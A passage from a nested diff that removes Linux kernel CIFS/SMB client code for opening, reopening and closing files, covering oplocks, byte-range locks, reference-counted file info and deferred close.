+-	else if ((flags & O_TRUNC) == O_TRUNC)
+-		return FILE_OVERWRITE;
+-	else
+-		return FILE_OPEN;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-int cifs_posix_open(const char *full_path, struct inode **pinode,
+-			struct super_block *sb, int mode, unsigned int f_flags,
+-			__u32 *poplock, __u16 *pnetfid, unsigned int xid)
+-{
+-	int rc;
+-	FILE_UNIX_BASIC_INFO *presp_data;
+-	__u32 posix_flags = 0;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_fattr fattr;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-
+-	cifs_dbg(FYI, "posix open %s\n", full_path);
+-
+-	presp_data = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
+-	if (presp_data == NULL)
+-		return -ENOMEM;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto posix_open_ret;
+-	}
+-
+-	tcon = tlink_tcon(tlink);
+-	mode &= ~current_umask();
+-
+-	posix_flags = cifs_posix_convert_flags(f_flags);
+-	rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data,
+-			     poplock, full_path, cifs_sb->local_nls,
+-			     cifs_remap(cifs_sb));
+-	cifs_put_tlink(tlink);
+-
+-	if (rc)
+-		goto posix_open_ret;
+-
+-	if (presp_data->Type == cpu_to_le32(-1))
+-		goto posix_open_ret; /* open ok, caller does qpathinfo */
+-
+-	if (!pinode)
+-		goto posix_open_ret; /* caller does not need info */
+-
+-	cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);
+-
+-	/* get new inode and set it up */
+-	if (*pinode == NULL) {
+-		cifs_fill_uniqueid(sb, &fattr);
+-		*pinode = cifs_iget(sb, &fattr);
+-		if (!*pinode) {
+-			rc = -ENOMEM;
+-			goto posix_open_ret;
+-		}
+-	} else {
+-		cifs_revalidate_mapping(*pinode);
+-		rc = cifs_fattr_to_inode(*pinode, &fattr);
+-	}
+-
+-posix_open_ret:
+-	kfree(presp_data);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_sb_info *cifs_sb,
+-			struct cifs_tcon *tcon, unsigned int f_flags, __u32 *oplock,
+-			struct cifs_fid *fid, unsigned int xid, struct cifs_open_info_data *buf)
+-{
+-	int rc;
+-	int desired_access;
+-	int disposition;
+-	int create_options = CREATE_NOT_DIR;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifs_open_parms oparms;
+-
+-	if (!server->ops->open)
+-		return -ENOSYS;
+-
+-	desired_access = cifs_convert_flags(f_flags);
+-
+-/*********************************************************************
+- *  open flag mapping table:
+- *
+- *	POSIX Flag            CIFS Disposition
+- *	----------            ----------------
+- *	O_CREAT               FILE_OPEN_IF
+- *	O_CREAT | O_EXCL      FILE_CREATE
+- *	O_CREAT | O_TRUNC     FILE_OVERWRITE_IF
+- *	O_TRUNC               FILE_OVERWRITE
+- *	none of the above     FILE_OPEN
+- *
+- *	Note that there is not a direct match between disposition
+- *	FILE_SUPERSEDE (ie create whether or not file exists although
+- *	O_CREAT | O_TRUNC is similar but truncates the existing
+- *	file rather than creating a new file as FILE_SUPERSEDE does
+- *	(which uses the attributes / metadata passed in on open call)
+- *?
+- *?  O_SYNC is a reasonable match to CIFS writethrough flag
+- *?  and the read write flags match reasonably.  O_LARGEFILE
+- *?  is irrelevant because largefile support is always used
+- *?  by this client. Flags O_APPEND, O_DIRECT, O_DIRECTORY,
+- *	 O_FASYNC, O_NOFOLLOW, O_NONBLOCK need further investigation
+- *********************************************************************/
+-
+-	disposition = cifs_get_disposition(f_flags);
+-
+-	/* BB pass O_SYNC flag through on file attributes .. BB */
+-
+-	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+-	if (f_flags & O_SYNC)
+-		create_options |= CREATE_WRITE_THROUGH;
+-
+-	if (f_flags & O_DIRECT)
+-		create_options |= CREATE_NO_BUFFER;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = fid,
+-	};
+-
+-	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc)
+-		return rc;
+-
+-	/* TODO: Add support for calling posix query info but with passing in fid */
+-	if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, inode->i_sb,
+-					      xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, buf, inode->i_sb,
+-					 xid, fid);
+-
+-	if (rc) {
+-		server->ops->close(xid, tcon, fid);
+-		if (rc == -ESTALE)
+-			rc = -EOPENSTALE;
+-	}
+-
+-	return rc;
+-}
+-
+-static bool
+-cifs_has_mand_locks(struct cifsInodeInfo *cinode)
+-{
+-	struct cifs_fid_locks *cur;
+-	bool has_locks = false;
+-
+-	down_read(&cinode->lock_sem);
+-	list_for_each_entry(cur, &cinode->llist, llist) {
+-		if (!list_empty(&cur->locks)) {
+-			has_locks = true;
+-			break;
+-		}
+-	}
+-	up_read(&cinode->lock_sem);
+-	return has_locks;
+-}
+-
+-void
+-cifs_down_write(struct rw_semaphore *sem)
+-{
+-	while (!down_write_trylock(sem))
+-		msleep(10);
+-}
+-
+-static void cifsFileInfo_put_work(struct work_struct *work);
+-
+-struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+-				       struct tcon_link *tlink, __u32 oplock,
+-				       const char *symlink_target)
+-{
+-	struct dentry *dentry = file_dentry(file);
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifsFileInfo *cfile;
+-	struct cifs_fid_locks *fdlocks;
+-	struct cifs_tcon *tcon = tlink_tcon(tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	cfile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
+-	if (cfile == NULL)
+-		return cfile;
+-
+-	fdlocks = kzalloc(sizeof(struct cifs_fid_locks), GFP_KERNEL);
+-	if (!fdlocks) {
+-		kfree(cfile);
+-		return NULL;
+-	}
+-
+-	if (symlink_target) {
+-		cfile->symlink_target = kstrdup(symlink_target, GFP_KERNEL);
+-		if (!cfile->symlink_target) {
+-			kfree(fdlocks);
+-			kfree(cfile);
+-			return NULL;
+-		}
+-	}
+-
+-	INIT_LIST_HEAD(&fdlocks->locks);
+-	fdlocks->cfile = cfile;
+-	cfile->llist = fdlocks;
+-
+-	cfile->count = 1;
+-	cfile->pid = current->tgid;
+-	cfile->uid = current_fsuid();
+-	cfile->dentry = dget(dentry);
+-	cfile->f_flags = file->f_flags;
+-	cfile->invalidHandle = false;
+-	cfile->deferred_close_scheduled = false;
+-	cfile->tlink = cifs_get_tlink(tlink);
+-	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
+-	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
+-	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
+-	mutex_init(&cfile->fh_mutex);
+-	spin_lock_init(&cfile->file_info_lock);
+-
+-	cifs_sb_active(inode->i_sb);
+-
+-	/*
+-	 * If the server returned a read oplock and we have mandatory brlocks,
+-	 * set oplock level to None.
+-	 */
+-	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
+-		oplock = 0;
+-	}
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	list_add(&fdlocks->llist, &cinode->llist);
+-	up_write(&cinode->lock_sem);
+-
+-	spin_lock(&tcon->open_file_lock);
+-	if (fid->pending_open->oplock != CIFS_OPLOCK_NO_CHANGE && oplock)
+-		oplock = fid->pending_open->oplock;
+-	list_del(&fid->pending_open->olist);
+-
+-	fid->purge_cache = false;
+-	server->ops->set_fid(cfile, fid, oplock);
+-
+-	list_add(&cfile->tlist, &tcon->openFileList);
+-	atomic_inc(&tcon->num_local_opens);
+-
+-	/* if readable file instance put first in list*/
+-	spin_lock(&cinode->open_file_lock);
+-	if (file->f_mode & FMODE_READ)
+-		list_add(&cfile->flist, &cinode->openFileList);
+-	else
+-		list_add_tail(&cfile->flist, &cinode->openFileList);
+-	spin_unlock(&cinode->open_file_lock);
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	if (fid->purge_cache)
+-		cifs_zap_mapping(inode);
+-
+-	file->private_data = cfile;
+-	return cfile;
+-}
+-
+-struct cifsFileInfo *
+-cifsFileInfo_get(struct cifsFileInfo *cifs_file)
+-{
+-	spin_lock(&cifs_file->file_info_lock);
+-	cifsFileInfo_get_locked(cifs_file);
+-	spin_unlock(&cifs_file->file_info_lock);
+-	return cifs_file;
+-}
+-
+-static void cifsFileInfo_put_final(struct cifsFileInfo *cifs_file)
+-{
+-	struct inode *inode = d_inode(cifs_file->dentry);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifsLockInfo *li, *tmp;
+-	struct super_block *sb = inode->i_sb;
+-
+-	/*
+-	 * Delete any outstanding lock records. We'll lose them when the file
+-	 * is closed anyway.
+-	 */
+-	cifs_down_write(&cifsi->lock_sem);
+-	list_for_each_entry_safe(li, tmp, &cifs_file->llist->locks, llist) {
+-		list_del(&li->llist);
+-		cifs_del_lock_waiters(li);
+-		kfree(li);
+-	}
+-	list_del(&cifs_file->llist->llist);
+-	kfree(cifs_file->llist);
+-	up_write(&cifsi->lock_sem);
+-
+-	cifs_put_tlink(cifs_file->tlink);
+-	dput(cifs_file->dentry);
+-	cifs_sb_deactive(sb);
+-	kfree(cifs_file->symlink_target);
+-	kfree(cifs_file);
+-}
+-
+-static void cifsFileInfo_put_work(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cifs_file = container_of(work,
+-			struct cifsFileInfo, put);
+-
+-	cifsFileInfo_put_final(cifs_file);
+-}
+-
+-/**
+- * cifsFileInfo_put - release a reference of file priv data
+- *
+- * Always potentially wait for oplock handler. See _cifsFileInfo_put().
+- *
+- * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
+- */
+-void cifsFileInfo_put(struct cifsFileInfo *cifs_file)
+-{
+-	_cifsFileInfo_put(cifs_file, true, true);
+-}
+-
+-/**
+- * _cifsFileInfo_put - release a reference of file priv data
+- *
+- * This may involve closing the filehandle @cifs_file out on the
+- * server. Must be called without holding tcon->open_file_lock,
+- * cinode->open_file_lock and cifs_file->file_info_lock.
+- *
+- * If @wait_for_oplock_handler is true and we are releasing the last
+- * reference, wait for any running oplock break handler of the file
+- * and cancel any pending one.
+- *
+- * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
+- * @wait_oplock_handler: must be false if called from oplock_break_handler
+- * @offload:	not offloaded on close and oplock breaks
+- *
+- */
+-void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+-		       bool wait_oplock_handler, bool offload)
+-{
+-	struct inode *inode = d_inode(cifs_file->dentry);
+-	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	bool oplock_break_cancelled;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	spin_lock(&cifsi->open_file_lock);
+-	spin_lock(&cifs_file->file_info_lock);
+-	if (--cifs_file->count > 0) {
+-		spin_unlock(&cifs_file->file_info_lock);
+-		spin_unlock(&cifsi->open_file_lock);
+-		spin_unlock(&tcon->open_file_lock);
+-		return;
+-	}
+-	spin_unlock(&cifs_file->file_info_lock);
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &fid);
+-
+-	/* store open in pending opens to make sure we don't miss lease break */
+-	cifs_add_pending_open_locked(&fid, cifs_file->tlink, &open);
+-
+-	/* remove it from the lists */
+-	list_del(&cifs_file->flist);
+-	list_del(&cifs_file->tlist);
+-	atomic_dec(&tcon->num_local_opens);
+-
+-	if (list_empty(&cifsi->openFileList)) {
+-		cifs_dbg(FYI, "closing last open instance for inode %p\n",
+-			 d_inode(cifs_file->dentry));
+-		/*
+-		 * In strict cache mode we need invalidate mapping on the last
+-		 * close  because it may cause a error when we open this file
+-		 * again and get at least level II oplock.
+-		 */
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
+-			set_bit(CIFS_INO_INVALID_MAPPING, &cifsi->flags);
+-		cifs_set_oplock_level(cifsi, 0);
+-	}
+-
+-	spin_unlock(&cifsi->open_file_lock);
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	oplock_break_cancelled = wait_oplock_handler ?
+-		cancel_work_sync(&cifs_file->oplock_break) : false;
+-
+-	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-		unsigned int xid;
+-
+-		xid = get_xid();
+-		if (server->ops->close_getattr)
+-			server->ops->close_getattr(xid, tcon, cifs_file);
+-		else if (server->ops->close)
+-			server->ops->close(xid, tcon, &cifs_file->fid);
+-		_free_xid(xid);
+-	}
+-
+-	if (oplock_break_cancelled)
+-		cifs_done_oplock_break(cifsi);
+-
+-	cifs_del_pending_open(&open);
+-
+-	if (offload)
+-		queue_work(fileinfo_put_wq, &cifs_file->put);
+-	else
+-		cifsFileInfo_put_final(cifs_file);
+-}
+-
+-int cifs_open(struct inode *inode, struct file *file)
+-
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	__u32 oplock;
+-	struct cifs_sb_info *cifs_sb;
+-	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifsFileInfo *cfile = NULL;
+-	void *page;
+-	const char *full_path;
+-	bool posix_open_ok = false;
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	struct cifs_open_info_data data = {};
+-
+-	xid = get_xid();
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
+-		free_xid(xid);
+-		return -EIO;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		free_xid(xid);
+-		return PTR_ERR(tlink);
+-	}
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(file_dentry(file), page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "inode = 0x%p file flags are 0x%x for %s\n",
+-		 inode, file->f_flags, full_path);
+-
+-	if (file->f_flags & O_DIRECT &&
+-	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			file->f_op = &cifs_file_direct_nobrl_ops;
+-		else
+-			file->f_op = &cifs_file_direct_ops;
+-	}
+-
+-	/* Get the cached handle as SMB2 close is deferred */
+-	rc = cifs_get_readable_path(tcon, full_path, &cfile);
+-	if (rc == 0) {
+-		if (file->f_flags == cfile->f_flags) {
+-			file->private_data = cfile;
+-			spin_lock(&CIFS_I(inode)->deferred_lock);
+-			cifs_del_deferred_close(cfile);
+-			spin_unlock(&CIFS_I(inode)->deferred_lock);
+-			goto use_cache;
+-		} else {
+-			_cifsFileInfo_put(cfile, true, false);
+-		}
+-	}
+-
+-	if (server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (!tcon->broken_posix_open && tcon->unix_ext &&
+-	    cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		/* can not refresh inode info since size could be stale */
+-		rc = cifs_posix_open(full_path, &inode, inode->i_sb,
+-				cifs_sb->ctx->file_mode /* ignored */,
+-				file->f_flags, &oplock, &fid.netfid, xid);
+-		if (rc == 0) {
+-			cifs_dbg(FYI, "posix open succeeded\n");
+-			posix_open_ok = true;
+-		} else if ((rc == -EINVAL) || (rc == -EOPNOTSUPP)) {
+-			if (tcon->ses->serverNOS)
+-				cifs_dbg(VFS, "server %s of type %s returned unexpected error on SMB posix open, disabling posix open support. Check if server update available.\n",
+-					 tcon->ses->ip_addr,
+-					 tcon->ses->serverNOS);
+-			tcon->broken_posix_open = true;
+-		} else if ((rc != -EIO) && (rc != -EREMOTE) &&
+-			 (rc != -EOPNOTSUPP)) /* path not found or net err */
+-			goto out;
+-		/*
+-		 * Else fallthrough to retry open the old way on network i/o
+-		 * or DFS errors.
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &fid);
+-
+-	cifs_add_pending_open(&fid, tlink, &open);
+-
+-	if (!posix_open_ok) {
+-		if (server->ops->get_lease_key)
+-			server->ops->get_lease_key(inode, &fid);
+-
+-		rc = cifs_nt_open(full_path, inode, cifs_sb, tcon, file->f_flags, &oplock, &fid,
+-				  xid, &data);
+-		if (rc) {
+-			cifs_del_pending_open(&open);
+-			goto out;
+-		}
+-	}
+-
+-	cfile = cifs_new_fileinfo(&fid, file, tlink, oplock, data.symlink_target);
+-	if (cfile == NULL) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if ((oplock & CIFS_CREATE_ACTION) && !posix_open_ok && tcon->unix_ext) {
+-		/*
+-		 * Time to set mode which we can not set earlier due to
+-		 * problems creating new read-only files.
+-		 */
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= inode->i_mode,
+-			.uid	= INVALID_UID, /* no change */
+-			.gid	= INVALID_GID, /* no change */
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= 0,
+-		};
+-		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid.netfid,
+-				       cfile->pid);
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-use_cache:
+-	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+-			   file->f_mode & FMODE_WRITE);
+-	if (file->f_flags & O_DIRECT &&
+-	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
+-	     file->f_flags & O_APPEND))
+-		cifs_invalidate_cache(file_inode(file),
+-				      FSCACHE_INVAL_DIO_WRITE);
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&data);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int cifs_push_posix_locks(struct cifsFileInfo *cfile);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/*
+- * Try to reacquire byte range locks that were released when session
+- * to server was lost.
+- */
+-static int
+-cifs_relock_file(struct cifsFileInfo *cfile)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	down_read_nested(&cinode->lock_sem, SINGLE_DEPTH_NESTING);
+-	if (cinode->can_cache_brlcks) {
+-		/* can cache locks - no need to relock */
+-		up_read(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		rc = cifs_push_posix_locks(cfile);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = tcon->ses->server->ops->push_mand_locks(cfile);
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static int
+-cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	__u32 oplock;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsInodeInfo *cinode;
+-	struct inode *inode;
+-	void *page;
+-	const char *full_path;
+-	int desired_access;
+-	int disposition = FILE_OPEN;
+-	int create_options = CREATE_NOT_DIR;
+-	struct cifs_open_parms oparms;
+-
+-	xid = get_xid();
+-	mutex_lock(&cfile->fh_mutex);
+-	if (!cfile->invalidHandle) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		free_xid(xid);
+-		return 0;
+-	}
+-
+-	inode = d_inode(cfile->dentry);
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	tcon = tlink_tcon(cfile->tlink);
+-	server = tcon->ses->server;
+-
+-	/*
+-	 * Can not grab rename sem here because various ops, including those
+-	 * that already have the rename sem can end up causing writepage to get
+-	 * called and if the server was down that means we end up here, and we
+-	 * can never tell if the caller already has the rename_sem.
+-	 */
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(cfile->dentry, page);
+-	if (IS_ERR(full_path)) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		free_dentry_path(page);
+-		free_xid(xid);
+-		return PTR_ERR(full_path);
+-	}
+-
+-	cifs_dbg(FYI, "inode = 0x%p file flags 0x%x for %s\n",
+-		 inode, cfile->f_flags, full_path);
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext && cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		/*
+-		 * O_CREAT, O_EXCL and O_TRUNC already had their effect on the
+-		 * original open. Must mask them off for a reopen.
+-		 */
+-		unsigned int oflags = cfile->f_flags &
+-						~(O_CREAT | O_EXCL | O_TRUNC);
+-
+-		rc = cifs_posix_open(full_path, NULL, inode->i_sb,
+-				     cifs_sb->ctx->file_mode /* ignored */,
+-				     oflags, &oplock, &cfile->fid.netfid, xid);
+-		if (rc == 0) {
+-			cifs_dbg(FYI, "posix reopen succeeded\n");
+-			oparms.reconnect = true;
+-			goto reopen_success;
+-		}
+-		/*
+-		 * fallthrough to retry open the old way on errors, especially
+-		 * in the reconnect path it is important to retry hard
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	desired_access = cifs_convert_flags(cfile->f_flags);
+-
+-	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+-	if (cfile->f_flags & O_SYNC)
+-		create_options |= CREATE_WRITE_THROUGH;
+-
+-	if (cfile->f_flags & O_DIRECT)
+-		create_options |= CREATE_NO_BUFFER;
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &cfile->fid);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = &cfile->fid,
+-		.reconnect = true,
+-	};
+-
+-	/*
+-	 * Can not refresh inode by passing in file_info buf to be returned by
+-	 * ops->open and then calling get_inode_info with returned buf since
+-	 * file might have write behind data that needs to be flushed and server
+-	 * version of file size can be stale. If we knew for sure that inode was
+-	 * not dirty locally we could do this.
+-	 */
+-	rc = server->ops->open(xid, &oparms, &oplock, NULL);
+-	if (rc == -ENOENT && oparms.reconnect == false) {
+-		/* durable handle timeout is expired - open the file again */
+-		rc = server->ops->open(xid, &oparms, &oplock, NULL);
+-		/* indicate that we need to relock the file */
+-		oparms.reconnect = true;
+-	}
+-
+-	if (rc) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		cifs_dbg(FYI, "cifs_reopen returned 0x%x\n", rc);
+-		cifs_dbg(FYI, "oplock: %d\n", oplock);
+-		goto reopen_error_exit;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-reopen_success:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	cfile->invalidHandle = false;
+-	mutex_unlock(&cfile->fh_mutex);
+-	cinode = CIFS_I(inode);
+-
+-	if (can_flush) {
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-		if (!is_interrupt_error(rc))
+-			mapping_set_error(inode->i_mapping, rc);
+-
+-		if (tcon->posix_extensions)
+-			rc = smb311_posix_get_inode_info(&inode, full_path, inode->i_sb, xid);
+-		else if (tcon->unix_ext)
+-			rc = cifs_get_inode_info_unix(&inode, full_path,
+-						      inode->i_sb, xid);
+-		else
+-			rc = cifs_get_inode_info(&inode, full_path, NULL,
+-						 inode->i_sb, xid, NULL);
+-	}
+-	/*
+-	 * Else we are writing out data to server already and could deadlock if
+-	 * we tried to flush data, and since we do not know if we have data that
+-	 * would invalidate the current end of file on the server we can not go
+-	 * to the server to get the new inode info.
+-	 */
+-
+-	/*
+-	 * If the server returned a read oplock and we have mandatory brlocks,
+-	 * set oplock level to None.
+-	 */
+-	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
+-		oplock = 0;
+-	}
+-
+-	server->ops->set_fid(cfile, &cfile->fid, oplock);
+-	if (oparms.reconnect)
+-		cifs_relock_file(cfile);
+-
+-reopen_error_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-void smb2_deferred_work_close(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cfile = container_of(work,
+-			struct cifsFileInfo, deferred.work);
+-
+-	spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-	cifs_del_deferred_close(cfile);
+-	cfile->deferred_close_scheduled = false;
+-	spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-	_cifsFileInfo_put(cfile, true, false);
+-}
+-
+-int cifs_close(struct inode *inode, struct file *file)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_deferred_close *dclose;
+-
+-	cifs_fscache_unuse_inode_cookie(inode, file->f_mode & FMODE_WRITE);
+-
+-	if (file->private_data != NULL) {
+-		cfile = file->private_data;
+-		file->private_data = NULL;
+-		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
+-		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
+-		    cinode->lease_granted &&
+-		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
+-		    dclose) {
+-			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
+-				inode->i_ctime = inode->i_mtime = current_time(inode);
+-			}
+-			spin_lock(&cinode->deferred_lock);
+-			cifs_add_deferred_close(cfile, dclose);
+-			if (cfile->deferred_close_scheduled &&
+-			    delayed_work_pending(&cfile->deferred)) {
+-				/*
+-				 * If there is no pending work, mod_delayed_work queues new work.
+-				 * So, Increase the ref count to avoid use-after-free.
+-				 */
+-				if (!mod_delayed_work(deferredclose_wq,
+-						&cfile->deferred, cifs_sb->ctx->closetimeo))
+-					cifsFileInfo_get(cfile);
+-			} else {
+-				/* Deferred close for files */
+-				queue_delayed_work(deferredclose_wq,
+-						&cfile->deferred, cifs_sb->ctx->closetimeo);
+-				cfile->deferred_close_scheduled = true;
+-				spin_unlock(&cinode->deferred_lock);
+-				return 0;
+-			}
+-			spin_unlock(&cinode->deferred_lock);
+-			_cifsFileInfo_put(cfile, true, false);
+-		} else {
+-			_cifsFileInfo_put(cfile, true, false);
+-			kfree(dclose);
+-		}
+-	}
+-
+-	/* return code from the ->release op is always ignored */
+-	return 0;
+-}
+-
+-void
+-cifs_reopen_persistent_handles(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *open_file, *tmp;
+-	struct list_head tmp_list;
+-
+-	if (!tcon->use_persistent || !tcon->need_reopen_files)
+-		return;
+-
+-	tcon->need_reopen_files = false;
+-
+-	cifs_dbg(FYI, "Reopen persistent handles\n");
+-	INIT_LIST_HEAD(&tmp_list);
+-
+-	/* list all files open on tree connection, reopen resilient handles  */
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(open_file, &tcon->openFileList, tlist) {
+-		if (!open_file->invalidHandle)
+-			continue;
+-		cifsFileInfo_get(open_file);
+-		list_add_tail(&open_file->rlist, &tmp_list);
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
